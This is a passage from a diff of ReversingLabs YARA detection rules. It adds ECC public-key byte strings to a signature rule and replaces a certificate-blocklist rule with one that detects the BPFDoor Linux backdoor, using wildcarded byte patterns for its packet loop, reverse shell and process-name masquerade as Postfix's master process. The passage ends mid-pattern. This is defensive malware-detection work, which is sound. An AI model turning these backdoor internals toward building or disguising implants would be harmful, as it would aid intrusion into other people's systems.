+            9F A0 F6 5B D5 8B 06 19 86 4F 53 10 6D 07 24 27
+            A1 A0 F8 D5 47 19 61 4C 7D CA 93 27 EA 74 0C EF
+            6F 96 09 FE 63 EC 70 5D 36 AD 67 77 AE C9 9D 7C
+            55 44 3A A2 63 51 1F F5 E3 62 D4 A9 47 07 3E CC
+            20
+        }
+		$ecc_public_key_3 = {
+            04 A7 56 7A 7C 52 DA 64 9B 0E 2D 5C D8 5E AC 92
+            3D FE 01 E6 19 4A 3D 14 03 4B FA 60 27 20 D9 83
+            89 69 FA 54 C6 9A 18 5E 55 2A 64 DE 06 F6 8D 4A
+            3B AD 10 3C 65 3D 90 88 04 89 E0 30 61 B3 AE 5D
+            01 A7 7B DE 7C B2 BE CA 65 61 00 86 AE DA 8F 7B
+            D0 89 AD 4D 1D 59 9A 41 B1 BC 47 80 DC 9E 62 C3
+            F9
+        }
+		$ecc_public_key_4 = {
+            04 CD 0F 5B 56 82 DF F0 45 1A D6 AD F7 79 F0 1D
+            C9 AC 96 D6 9E 4E 9C 1F B4 42 11 CA 86 BF 6D FB
+            85 A3 C5 E5 19 5C D7 EE A6 3F 69 67 D8 78 E2 A6
+            C9 C4 DB 2D 79 2E E7 8B 8D 02 6F 31 22 4D 06 E3
+            60 72 45 9D 0E 42 77 9E CE CF E5 7F 85 9B 18 E4
+            FC CC 2E 72 D3 16 93 4E CA 99 63 5C A1 05 2A 6C
+            06
+        }
+		$ecc_public_key_5 = {
+            04 57 CF EA B3 39 4D 3F A1 21 E0 6E 2F 38 72 C6
+            87 97 F3 85 0B 47 E7 0F 51 C8 D1 F4 99 9B CA 59
+            65 FF 4C F9 EA 0B B7 25 D5 D2 F6 EC 31 2D 32 62
+            12 D7 76 86 A7 FA 38 C9 65 D4 FE 73 E2 84 39 F8
+            4C 49 62 13 DD BA D5 88 A0 5F 3D C8 4F B0 3F 8F
+            A1 50 11 E4 93 46 AD C3 5F CB F1 A4 6A 95 56 E8
+            C0
+        }
+		$ecc_public_key_6 = {
+            04 D1 D9 4A 8E 4C 0D 84 4A 51 BA 7C EF D3 CC FA
+            3A 9A B5 A7 63 13 3D 01 E0 49 3E FA C1 47 C9 92
+            B3 3A D7 FE 6F 9C F7 9A 3A 0F F5 0E 0A 0A C3 3F
+            C8 E7 12 14 8E D5 D5 6D 98 2C B3 71 32 0A EB 2A
+            BD F6 D7 6A 20 0B 67 45 9C D2 B2 BF 53 22 66 09
+            5D DB 11 F3 F1 05 33 58 A3 E2 B8 CF 7C CD 82 9B
+            BD
+        }
+		$ecc_public_key_7 = {
+            04 4A EE 58 AE 4D CA 66 DE 06 3A A3 11 FC E0 18
+            F0 6E 1C BA 2D 30 0C 89 D9 D6 EE 9B 73 83 A9 23
+            15 8C 2F 59 8A 5A DD 14 EA 9D 59 2B 43 B7 06 EC
+            32 B6 BA EE 41 B5 AD 5D A1 85 CC EA 1D 14 66 A3
+            67 7E 46 E2 94 F3 E7 B6 56 A1 15 59 A1 4F 37 97
+            B9 22 1E BD 11 EB F4 B2 1F 5E C3 14 9A E5 D9 97
+            99
+        }
+		$ecc_public_key_8 = {
+            04 DD A7 D9 BB 8A B8 0B FB 0B 7F 21 D2 F0 BE BE
+            73 F3 33 5D 1A BC 34 EA DE C6 9B BC D0 95 F6 F0
+            CC D0 0B BA 61 5B 51 46 7E 9E 2D 9F EE 8E 63 0C
+            17 EC 07 70 F5 CF 84 2E 40 83 9C E8 3F 41 6D 3B
+            AD D3 A4 14 59 36 78 9D 03 43 EE 10 13 6C 72 DE
+            AE 88 A7 A1 6B B5 43 CE 67 DC 23 FF 03 1C A3 E2
+            3E
+        }
+		$ecc_public_key_9 = {
+            04 D7 66 B5 1B DB AE B3 60 EE 46 EA 88 63 75 3B
+            2A 94 6D F3 5F 12 F6 E3 0F 9E B6 0A 14 53 48 52
+            C8 DC 3A B3 CB 48 20 26 12 4E FA 89 84 D4 DF 91
+            E4 29 7D 28 01 D9 DB 18 43 69 A1 1F B5 D3 86 16
+            DC C7 7F 67 23 DF DF 31 31 83 03 35 70 B1 4B B7
+            C8 17 BB 51 CB DC 94 17 DB EA 09 3B 76 12 DE AA
+            B5
+        }
+		$ecc_public_key_10 = {
+            04 15 B1 E8 FD 03 15 43 E5 AC EB 87 37 11 62 EF
+            D2 83 36 52 7D 45 57 0B 4A 8D 7B 54 3B 3A 6E 5F
+            15 02 C0 50 A6 CF 25 2F 7D CA 48 B8 C7 50 63 1C
+            2A 21 08 7C 9A 36 D8 0B FE D1 26 C5 58 31 30 28
+            25 F3 5D 5D A3 B8 B6 A5 B4 92 ED 6C 2C 9F EB DD
+            43 89 A2 3C 4B 48 91 1D 50 EC 26 DF D6 60 2E BD
+            21
+        }
+		$ecc_public_key_11 = {
+            04 03 47 7B 2F 75 C9 82 15 85 FB 75 E4 91 16 D4
+            AB 62 99 F5 3E 52 0B 06 CE 41 00 7F 97 E1 0A 24
+            3C 1D 01 04 EE 3D D2 8D 09 97 0C E0 75 E4 FA FB
+            77 8A 2A F5 03 60 4B 36 8B 16 23 16 AD 09 71 F4
+            4A F4 28 50 B4 FE 88 1C 6E 3F 6C 2F 2F 09 59 5B
+            A5 5B 0B 33 99 E2 C3 3D 89 F9 6A 2C EF B2 D3 06
+            E9
+        }
+		$ecc_public_key_12 = {
+            04 92 A0 41 E8 4B 82 84 5C E2 F8 31 11 99 86 64
+            4E 09 25 2F 9D 41 2F 0A AE 35 4F 74 95 B2 51 64
+            6B 8D 6B E6 3F 70 95 F0 05 44 47 A6 72 38 50 76
+            95 02 5A 8E AE 28 9E F9 2D 4E 99 EF 2C 48 6F 4C
+            25 29 E8 D1 71 5B DF 1D C1 75 37 B4 D7 FA 7B 7A
+            42 9C 6A 0A 56 5A 7C 69 0B AA 80 09 24 6C 7E C1
+            46
+        }
+		$ecc_public_key_13 = {
+            04 A2 D5 9C 82 7B 95 9D F1 52 78 87 FE 8A 16 BF
+            05 E6 DF A3 02 4F 0D 07 C6 00 51 BA 0C 02 52 2D
+            22 A4 42 39 C4 FE 8F EA C9 C1 BE D4 4D FF 9F 7A
+            9E E2 B1 7C 9A AD A7 86 09 73 87 D1 E7 9A E3 7A
+            A5 AA 6E FB BA B3 70 C0 67 88 A2 35 D4 A3 9A B1
+            FD AD C2 EF 31 FA A8 B9 F3 FB 08 C6 91 D1 FB 29
+            95
+        }
+		$ecc_public_key_14 = {
+            04 98 E9 2F 3D 40 72 A4 ED 93 22 72 81 13 1C DD
+            10 95 F1 C5 A3 4E 71 DC 14 16 D9 0E E5 A6 05 2A
+            77 64 7B 5F 4E 38 D3 BB 1C 44 B5 7F F5 1F B6 32
+            62 5D C9 E9 84 5B 4F 30 4F 11 5A 00 FD 58 58 0C
+            A5 F5 0F 2C 4D 07 47 13 75 DA 97 97 97 6F 31 5C
+            ED 2B 9D 7B 20 3B D8 B9 54 D9 5E 99 A4 3A 51 0A
+            31
+        }
+		$ecc_public_key_15 = {
+            04 0D 30 5E 1B 15 9D 03 D0 A1 79 35 B7 3A 3C 92
+            7A CA 15 1C CD 62 F3 9C 26 5C 07 3D E5 54 FA A3
+            D6 CC 12 EA F4 14 5F E8 8E 19 AB 2F 2E 48 E6 AC
+            18 43 78 AC D0 37 C3 BD B2 CD 2C E6 47 E2 1A E6
+            63 B8 3D 2E 2F 78 C4 4F DB F4 0F A4 68 4C 55 72
+            6B 95 1D 4E 18 42 95 78 CC 37 3C 91 E2 9B 65 2B
+            29
+        }
+		$ecc_public_key_16 = {
+            04 1A AC 54 5A A9 F9 68 23 E7 7A D5 24 6F 53 C6
+            5A D8 4B AB C6 D5 B6 D1 E6 73 71 AE DD 9C D6 0C
+            61 FD DB A0 89 03 B8 05 14 EC 57 CE EE 5D 3F E2
+            21 B3 CE F7 D4 8A 79 E0 A3 83 7E 2D 97 D0 61 C4
+            F1 99 DC 25 91 63 AB 7F 30 A3 B4 70 E2 C7 A1 33
+            9C F3 BF 2E 5C 53 B1 5F B3 7D 32 7F 8A 34 E3 79
+            79
+        }
+		$ecc_public_key_17 = {
+            04 E1 FD 8E B8 43 24 AB 96 7B 85 C2 BA 0B AD 8D
+            E0 3A E3 24 B9 D2 B1 BE 88 3A CA BF 4A B8 F9 EF
+            2C 2F AF 51 50 3C 47 75 6C F8 94 B7 9B FC 28 1E
+            C5 54 CC 63 9D 16 4B 53 C1 E7 20 AB CD AC 25 D2
+            7F 8F C2 C1 5A 82 5E 30 8B 7A 54 CE 03 B5 91 7F
+            AA 94 D0 D1 8A 48 CC 82 05 26 A1 D5 51 12 D6 7B
+            36
+        }
+		$ecc_public_key_18 = {
+            04 19 E7 BC AC 44 65 ED CD B8 3F 58 FB 8D B1 57
+            A9 44 2D 05 15 F2 EF 0B FF 10 74 9F B5 62 52 5F
+            66 7E 1F E5 DC 1B 45 79 0B CC C6 53 0A 9D 8D 5D
+            02 D9 A9 59 DE 02 5A F6 95 2A 0E 8D 38 4A 8A 49
+            C6 BC C6 03 38 07 5F 55 DA 7E 09 6E E2 7F 5E D0
+            45 20 0F 59 76 10 D6 A0 24 F0 2D DE 36 F2 6C 29
+            39
+        }
+		$ecc_public_key_19 = {
+            04 B8 C6 79 D3 8F 6C 25 0E 9F 2E 39 19 1C 03 A4
+            AE 9A E5 39 07 09 16 CA 63 B1 B9 86 F8 8A 57 C1
+            57 CE 42 FA 73 A1 F7 65 42 FF 1E C1 00 B2 6E 73
+            0E FF C7 21 E5 18 A4 AA D9 71 3F A8 D4 B9 CE 8C
+            1D
+        }
+		$ecc_public_key_20 = {
+            04 C7 11 16 2A 76 1D 56 8E BE B9 62 65 D4 C3 CE
+            B4 F0 C3 30 EC 8F 6D D7 6E 39 BC C8 49 AB AB B8
+            E3 43 78 D5 81 06 5D EF C7 7D 9F CE D6 B3 90 75
+            DE 0C B0 90 DE 23 BA C8 D1 3E 67 E0 19 A9 1B 86
+            31 1E 5F 34 2D EE 17 FD 15 FB 7E 27 8A 32 A1 EA
+            C9 8F C9 7E 18 CB 2F 3B 2C 48 7A 7D A6 F4 01 07
+            AC
+        }
+		$ecc_public_key_21 = {
+            04 DE CD BB 70 20 F1 25 20 B4 94 E8 D7 B4 3B 0F
+            6E 87 DD AB AC CF 4D 40 2F 81 33 6B 59 09 18 D6
+            87 0D 26 23 9C B4 8D 95 9D 76 9F A5 B9 06 42 E6
+            AD 36 B2 C4 B3 AE 7A 3C 08 D5 CB 9D 3A 5E 45 21
+            6C 0B E3 20 F5 9B C2 DD 44 33 E3 42 B9 EA F2 28
+            42 92 AA FE 0C 07 CA 8A 13 99 3B 62 00 ED DA F3
+            35
+        }
+		$ecc_public_key_22 = {
+            04 5C D1 EE 57 0D D1 EF 81 7C 26 91 62 C3 6B E7
+            FC 73 A9 A0 C3 37 44 DC D6 F8 31 E2 77 93 5F 8F
+            EB E3 ED 38 73 F5 FC 8B 55 B9 14 A5 8F 2C 44 28
+            19 AF 5D FB DE 09 58 C9 29 B3 A9 99 D3 75 13 3C
+            A9
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ISIDA, TOV" and ( pe.signatures [ i ] . serial == "00:a3:e6:2b:e1:57:22:93:ad:61:8f:58:a8:aa:32:85:7f" or pe.signatures [ i ] . serial == "a3:e6:2b:e1:57:22:93:ad:61:8f:58:a8:aa:32:85:7f" ) and 1596585600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $oid_prime_explicit ) and ( any of ( $ecc_public_key_* ) ) and ( pe.number_of_signatures > 0 )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_672D4428450Afcc24Fc60969A5063A3E : INFO FILE
+rule REVERSINGLABS_Linux_Backdoor_Bpfdoor : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects BPFDoor backdoor."
 		author = "ReversingLabs"
-		id = "fcd8e808-dbd6-5903-868a-0aa4541e6321"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "81e64491-b0fe-5062-86cc-074e05208077"
+		date = "2025-10-13"
+		modified = "2025-10-13"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4686-L4702"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Linux.Backdoor.BPFDoor.yara#L1-L326"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8f5927e96109184bad7de4513994fd1021fe1cc5977e60fa72d808df95cb4516"
+		logic_hash = "9d3c5408180f5aedca77229c3ecaa499b71530b51d715cb4f35397f0874a84b8"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "BPFDoor"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$packet_loop_v1_p1 = {
+            55 48 89 E5 53 48 81 EC ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? BB
+            ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 89 D7 48 89 DE 48 89 C1 F3 48 A5 66 C7 85 ?? ?? FF FF
+            ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7
+            C0 89 C2 BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 8E ??
+            ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 8B 45 ?? 41 B8 ?? ?? ?? ?? 48 89 D1 BA ?? ?? ?? ?? BE
+            ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? EB ?? 90 48 8D 85 ?? ??
+            ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 48
+            8D 9D ?? ?? ?? ?? 8B 45 ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ??
+            ?? ?? ?? 48 89 DE 89 C7 E8 ?? ?? ?? ?? 89 45 ?? 48 8D 85 ?? ?? ?? ?? 48 83 C0 ?? 48
+            89 45 ?? 48 8B 45 ?? 0F B6 00 0F B6 C0 83 E0 ?? C1 E0 ?? 89 45 ?? 83 7D ?? ?? 7F ??
+            90 EB ?? 48 8B 45 ?? 0F B6 40 ?? 0F B6 C0 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 74
+            ?? E9 ?? ?? ?? ?? 8B 45 ?? 48 98 48 8D 50 ?? 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89 45
+            ?? 48 8B 45 ?? 0F B6 40 ?? C0 E8 ?? 0F B6 C0 C1 E0 ?? 89 45 ?? 8B 45 ?? 48 63 D0 8B
+            45 ?? 48 98 48 8D 04 02 48 8D 50 ?? 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89 45 ?? EB ??
+            48 8B 45 ?? 48 83 C0 ?? 48 89 45 ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 45 ?? EB ?? 48 8B
+        }
+		$packet_loop_v1_p2 = {
+            45 ?? 48 83 C0 ?? 48 89 45 ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 45 ?? 48 83 7D ?? ?? 0F
+            84 ?? ?? ?? ?? 48 8B 45 ?? 8B 40 ?? 83 F8 ?? 75 ?? 48 8B 45 ?? 8B 40 ?? 89 45 ?? EB
+            ?? 48 8B 45 ?? 8B 40 ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 45 ??
+            BA ?? ?? ?? ?? BE ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45 EC 00 00 00
+            00 48 C7 85 70 FC FF FF 00 00 00 00 48 C7 85 78 FC FF FF 00 00 00 00 C7 85 80 FC FF
+            FF 00 00 00 00 C6 85 50 FC FF FF 2F C6 85 51 FC FF FF 75 C6 85 52 FC FF FF 73 C6 85
+            53 FC FF FF 72 C6 85 54 FC FF FF 2F C6 85 55 FC FF FF 6C C6 85 56 FC FF FF 69 C6 85
+            57 FC FF FF 62 C6 85 58 FC FF FF 65 C6 85 59 FC FF FF 78 C6 85 5A FC FF FF 65 C6 85
+            5B FC FF FF 63 C6 85 5C FC FF FF 2F C6 85 5D FC FF FF 70 C6 85 5E FC FF FF 6F C6 85
+            5F FC FF FF 73 C6 85 60 FC FF FF 74 C6 85 61 FC FF FF 66 C6 85 62 FC FF FF 69 C6 85
+            63 FC FF FF 78 C6 85 64 FC FF FF 2F C6 85 65 FC FF FF 6D C6 85 66 FC FF FF 61 C6 85
+            67 FC FF FF 73 C6 85 68 FC FF FF 74 C6 85 69 FC FF FF 65 C6 85 6A FC FF FF 72 C6 85
+            6B FC FF FF 00 E8 ?? ?? ?? ?? 85 C0 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 C7 E8 ??
+            ?? ?? ?? 48 89 C2 48 8B 05 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D
+        }
+		$packet_loop_v1_p3 = {
+            95 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ??
+            ?? ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ??
+            48 89 C7 E8 ?? ?? ?? ?? 89 C1 48 8B 45 ?? 48 83 C0 ?? BA ?? ?? ?? ?? 89 CE 48 89 C7
+            E8 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 C1 48 8B 45 ?? 48
+            83 C0 ?? BA ?? ?? ?? ?? 89 CE 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? 48 89
+            C7 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 83 F8 ?? 74 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 85 C0
+            74 ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 8B 40 ?? 89 C7 E8 ?? ?? ?? ?? 48 89 C2 48 8D 85 ??
+            ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 0F B7 40 ?? 0F B7 C0 89 C7 E8
+            ?? ?? ?? ?? 0F B7 D0 48 8D 85 ?? ?? ?? ?? 89 D6 48 89 C7 E8 ?? ?? ?? ?? EB ?? 48 8B
+            45 ?? 0F B7 40 ?? 0F B7 D0 8B 45 ?? 89 D6 89 C7 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ??
+            7E ?? 8B 45 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? EB ?? 48 8B 45 ??
+            0F B7 40 ?? 0F B7 D0 8B 45
+        }
+		$reverse_shell_v1_p1 = {
+            48 89 C7 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 89 C7 E8 ??
+            ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85
+            ?? ?? ?? ?? BE ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 89
+            C7 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? 48 8D 95 ??
+            ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B C9 C3
+            E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 89 C7 E8 ??
+            ?? ?? ?? 8B 05 ?? ?? ?? ?? BE ?? ?? ?? ?? 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? BE ?? ?? ?? ?? 89 C7 E8 ?? ?? ??
+            ?? 8B 05 ?? ?? ?? ?? BE ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? BE ?? ??
+            ?? ?? 89 C7 E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ??
+            ?? 48 8D 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 8B 05
+            ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? EB ?? 90 EB ?? 90 EB ?? 90 B8 ?? ?? ?? ?? BA ?? ??
+            ?? ?? 48 8D 9D ?? ?? ?? ?? 48 89 D1 48 89 DF FC F3 48 AB 89 F8 89 CA 89 55 ?? 89 45
+            ?? 8B 05 ?? ?? ?? ?? 48 98 48 C1 E8 ?? 48 89 C2 48 8B 84 C5 ?? ?? ?? ?? 8B 0D ?? ??
+            ?? ?? 83 E1 ?? BB ?? ?? ?? ?? 48 89 DE 48 D3 E6 48 89 F1 48 09 C8 48 89 84 D5 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 48 98 48 C1 E8 ?? 48 89 C2 48 8B 84 C5 ?? ?? ?? ?? 8B 8D ??
+            ?? ?? ?? 83 E1 ?? BB ?? ?? ?? ?? 48 89 DF 48 D3 E7 48 89 F9 48 09 C8 48 89 84 D5 ??
+            ?? ?? ?? 8B 05 ?? ?? ?? ?? 3B 85 ?? ?? ?? ?? 7E ?? 8B 05 ?? ?? ?? ?? 83 C0 ?? EB
+        }
+		$reverse_shell_v1_p2 = {
+            8B 85 ?? ?? ?? ?? 83 C0 ?? 48 8D 9D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA
+            ?? ?? ?? ?? 48 89 DE 89 C7 E8 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 8B 05 ?? ?? ?? ??
+            48 98 48 C1 E8 ?? 48 8B 84 C5 ?? ?? ?? ?? 48 89 C2 8B 05 ?? ?? ?? ?? 83 E0 ?? 48 89
+            D3 89 C1 48 D3 EB 48 89 D8 83 E0 ?? 84 C0 74 ?? 8B 05 ?? ?? ?? ?? 48 8D 8D ?? ?? ??
+            ?? BA ?? ?? ?? ?? 48 89 CE 89 C7 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 8E ?? ?? ??
+            ?? 8B 55 ?? 48 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 89 CE 89 C7 E8 ?? ?? ?? ?? 85
+            C0 0F 8E ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 98 48 C1 E8 ?? 48 8B 84 C5 ?? ?? ?? ?? 48
+            89 C2 8B 85 ?? ?? ?? ?? 83 E0 ?? 48 89 D3 89 C1 48 D3 EB 48 89 D8 83 E0 ?? 84 C0 0F
+            84 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 45 ?? 48 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? BA ?? ?? ?? ?? 48 89 CE 89 C7 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 8E ?? ?? ??
+            ?? 8B 45 ?? 48 63 D0 48 8D 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48
+            89 45 ?? 48 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 89 C2 48 8B 45 ?? 29
+            C2 8B 45 ?? 8D 04 02 89 45 ?? 83 7D ?? ?? 7E ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 48 63
+            D0 48 8B 4D ?? 48 8D 85 ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 83 7D ?? ?? 7F
+            ?? B8 ?? ?? ?? ?? 89 C2 2B 55 ?? 8B 45 ?? 48 63 C8 48 8D 85 ?? ?? ?? ?? 48 01 C8 8B
+        }
+		$reverse_shell_v1_p3 = {
+            8D ?? ?? ?? ?? 48 89 C6 89 CF E8 ?? ?? ?? ?? 89 45 ?? 66 C7 85 ?? ?? FF FF ?? ?? 0F
+            B7 85 ?? ?? ?? ?? 66 89 85 ?? ?? FF FF 0F B6 85 ?? ?? ?? ?? 0F B6 C0 89 C2 C1 E2 ??
+            0F B6 85 ?? ?? ?? ?? 0F B6 C0 8D 04 02 66 89 85 ?? ?? FF FF 0F B6 85 ?? ?? ?? ?? 0F
+            B6 C0 89 C2 C1 E2 ?? 0F B6 85 ?? ?? ?? ?? 0F B6 C0 8D 04 02 66 89 85 ?? ?? FF FF 8B
+            05 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? BE ?? ?? ?? ?? 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 55 ?? 48 8D 85 ?? ?? ?? ?? 48
+            89 D6 48 29 C6 48 89 F0 48 89 C2 8B 05 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 89 CE 89
+            C7 E8 ?? ?? ?? ?? 89 45 ?? 48 8D 85 ?? ?? ?? ?? 89 C2 8B 45 ?? 01 C2 48 8B 45 ?? 89
+            D7 29 C7 89 F8 83 E8 ?? 89 45 ?? 83 7D ?? ?? 0F 8E ?? ?? ?? ?? 8B 45 ?? 48 63 D0 48
+            8B 45 ?? 48 8D 48 ?? 8B 05 ?? ?? ?? ?? 48 89 CE 89 C7 E8 ?? ?? ?? ?? 89 45 ?? E9 ??
+            ?? ?? ?? 8B 45 ?? 48 63 D0 8B 05 ?? ?? ?? ?? 48 8B 4D ?? 48 89 CE 89 C7 E8 ?? ?? ??
+            ?? 48 85 C0 0F 8F ?? ?? ?? ?? EB ?? 90 EB ?? 90 EB ?? 90 EB ?? 90 8B 85 ?? ?? ?? ??
+            89 C7 E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 89 C7 E8
+        }
+		$set_process_name_v1_p1 = {
+            55 48 89 E5 48 83 EC ?? 89 7D ?? 48 89 75 ?? 48 89 55 ?? 48 C7 45 ?? ?? ?? ?? ?? 48
+            C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 8B 45 ?? 48 8B 00 48 89 05 ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? EB ?? 48 8B 05 ?? ?? ?? ?? 8B 55 ?? 48 63 D2 48 C1 E2 ?? 48
+            01 D0 48 8B 00 48 89 C7 E8 ?? ?? ?? ?? 48 03 45 ?? 48 83 C0 ?? 48 89 45 ?? 83 45 ??
+            ?? 48 8B 05 ?? ?? ?? ?? 8B 55 ?? 48 63 D2 48 C1 E2 ?? 48 01 D0 48 8B 00 48 85 C0 75
+            ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 75 ?? B8 ?? ?? ??
+            ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 8B 55 ??
+            48 63 D2 48 C1 E2 ?? 48 01 D0 48 8B 00 48 89 C7 E8 ?? ?? ?? ?? 48 8D 50 ?? 48 8B 05
+            ?? ?? ?? ?? 8B 4D ?? 48 63 C9 48 C1 E1 ?? 48 01 C8 48 8B 08 48 8B 45 ?? 48 89 CE 48
+            89 C7 E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 8B 55 ?? 48 63 D2 48 C1 E2 ?? 48 8D 14 10
+            48 8B 45 ?? 48 89 02 48 8B 05 ?? ?? ?? ?? 8B 55 ?? 48 63 D2 48 C1 E2 ?? 48 01 D0 48
+        }
+		$set_process_name_v1_p2 = {
+            8B 00 48 89 C7 E8 ?? ?? ?? ?? 48 83 C0 ?? 48 01 45 ?? 83 45 ?? ?? 48 8B 05 ?? ?? ??
+            ?? 8B 55 ?? 48 63 D2 48 C1 E2 ?? 48 01 D0 48 8B 00 48 85 C0 0F 85 ?? ?? ?? ?? 48 8B
+            45 ?? 48 8B 00 48 89 45 ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 48 98 48 C1 E0 ?? 48
